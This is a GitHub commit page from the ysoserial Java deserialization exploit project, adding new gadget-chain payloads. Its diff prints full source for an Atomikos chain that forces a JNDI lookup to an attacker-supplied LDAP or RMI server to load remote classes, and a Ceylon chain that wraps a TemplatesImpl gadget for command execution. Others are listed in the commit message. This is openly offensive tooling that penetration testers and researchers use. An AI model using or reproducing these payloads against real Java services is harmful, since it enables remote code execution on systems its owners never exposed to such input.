-
Notifications
You must be signed in to change notification settings - Fork 1.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
* CommonsCollections8 payload (#116) * New gadgets (Struts2JasperReports - Atomikos - SpringJta) (#123) * added Atomikos gadget payload * added Atomikos gadget payload * naming * added spring-jta gadget * added strutsJasperReports gadget + tests * updated deps list on springJta * fixed authors * renaming * Add new payload in Commons Collections 3.2.1 (#125) * Add Jython2 gadget (#135) This version of Jython2 executes a command through os.system(). Based on Jython1 from @pwntester & @cschneider4711 Co-authored-by: Chris Frohoff <[email protected]> * Add scala and clojure payloads from a couple of years ago (#137) * Add some payloads for Scala * Add new clojure payload effecting versions since 1.8.0 * Fix infinite loop behavior of clojure2 payload. * add CommonsBeanutils2 (#163) * ceylon gadget (#173) Co-authored-by: navalorenzo <[email protected]> Co-authored-by: Stefano Ciccone <[email protected]> Co-authored-by: 梅子酒 <[email protected]> Co-authored-by: Yorick Koster <[email protected]> Co-authored-by: Ian Haken <[email protected]> Co-authored-by: k4n5ha0 <[email protected]> Co-authored-by: supersache <[email protected]>
- Loading branch information
1 parent
bac4220
commit be6cbf7
Showing
15 changed files
with
847 additions
and
42 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,77 @@ | ||
package ysoserial.payloads; | ||
|
||
import javax.management.BadAttributeValueExpException; | ||
|
||
import com.atomikos.icatch.jta.RemoteClientUserTransaction; | ||
|
||
import ysoserial.payloads.annotation.Authors; | ||
import ysoserial.payloads.annotation.Dependencies; | ||
import ysoserial.payloads.annotation.PayloadTest; | ||
import ysoserial.payloads.util.PayloadRunner; | ||
import ysoserial.payloads.util.Reflections; | ||
|
||
/** | ||
* | ||
* Gadget chain: | ||
* | ||
* javax/management/BadAttributeValueExpException.readObject() | ||
* com/atomikos/icatch/jta/RemoteClientUserTransaction.toString() | ||
* com/atomikos/icatch/jta/RemoteClientUserTransaction.checkSetup() | ||
* javax/naming/InitialContext.lookup() | ||
* | ||
* | ||
* Arguments: | ||
* - (rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname> | ||
* | ||
* | ||
* @author pwntester | ||
* payload added by sciccone | ||
* | ||
* This gadget chain was also discovered by pwntester: | ||
* https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf | ||
* | ||
*/ | ||
@PayloadTest(harness="ysoserial.test.payloads.JRMPReverseConnectTest") | ||
@Dependencies( { "com.atomikos:transactions-osgi:4.0.6", "javax.transaction:jta:1.1" } ) | ||
@Authors({ Authors.PWNTESTER, Authors.SCICCONE }) | ||
public class Atomikos implements ObjectPayload<Object> { | ||
|
||
@Override | ||
public Object getObject(String command) throws Exception { | ||
|
||
// validate command | ||
int sep = command.lastIndexOf('/'); | ||
if ( sep < 0 || (!command.startsWith("ldap") && !command.startsWith("rmi"))) | ||
throw new IllegalArgumentException("Command format is: " + command | ||
+ "(rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>"); | ||
|
||
String url = command.substring(0, sep); | ||
String className = command.substring(sep + 1); | ||
|
||
// create factory based on url | ||
String initialContextFactory; | ||
if (url.startsWith("ldap")) | ||
initialContextFactory = "com.sun.jndi.ldap.LdapCtxFactory"; | ||
else | ||
initialContextFactory = "com.sun.jndi.rmi.registry.RegistryContextFactory"; | ||
|
||
// create object | ||
RemoteClientUserTransaction rcut = new RemoteClientUserTransaction(); | ||
|
||
// set values using reflection | ||
Reflections.setFieldValue(rcut, "initialContextFactory", initialContextFactory); | ||
Reflections.setFieldValue(rcut, "providerUrl", url); | ||
Reflections.setFieldValue(rcut, "userTransactionServerLookupName", className); | ||
|
||
// create exception | ||
BadAttributeValueExpException exception = new BadAttributeValueExpException(null); | ||
Reflections.setFieldValue(exception, "val", rcut); | ||
|
||
return exception; | ||
} | ||
|
||
|
||
public static void main ( final String[] args ) throws Exception { | ||
PayloadRunner.run(Atomikos.class, args); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
package ysoserial.payloads; | ||
|
||
import com.redhat.ceylon.compiler.java.language.SerializationProxy; | ||
|
||
import ysoserial.payloads.annotation.Authors; | ||
import ysoserial.payloads.annotation.Dependencies; | ||
import ysoserial.payloads.util.Gadgets; | ||
|
||
@Authors({ Authors.KULLRICH }) | ||
@Dependencies({ "org.ceylon-lang:ceylon.language:1.3.3" }) | ||
public class Ceylon implements ObjectPayload<Object> | ||
{ | ||
|
||
// | ||
// Probably the simplest deser gadget ever ;-) | ||
// | ||
@Override | ||
public Object getObject(String command) throws Exception { | ||
final Object templates = Gadgets.createTemplatesImpl(command); | ||
|
||
return new SerializationProxy (templates, templates.getClass(), "getOutputProperties"); | ||
} | ||
} |
Oops, something went wrong.